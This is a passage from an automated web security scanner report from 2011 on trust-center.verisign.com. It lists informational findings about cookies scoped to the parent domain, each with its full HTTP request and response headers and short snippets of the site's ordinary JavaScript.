Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

...[SNIP]...

9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*
   
...[SNIP]...

9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

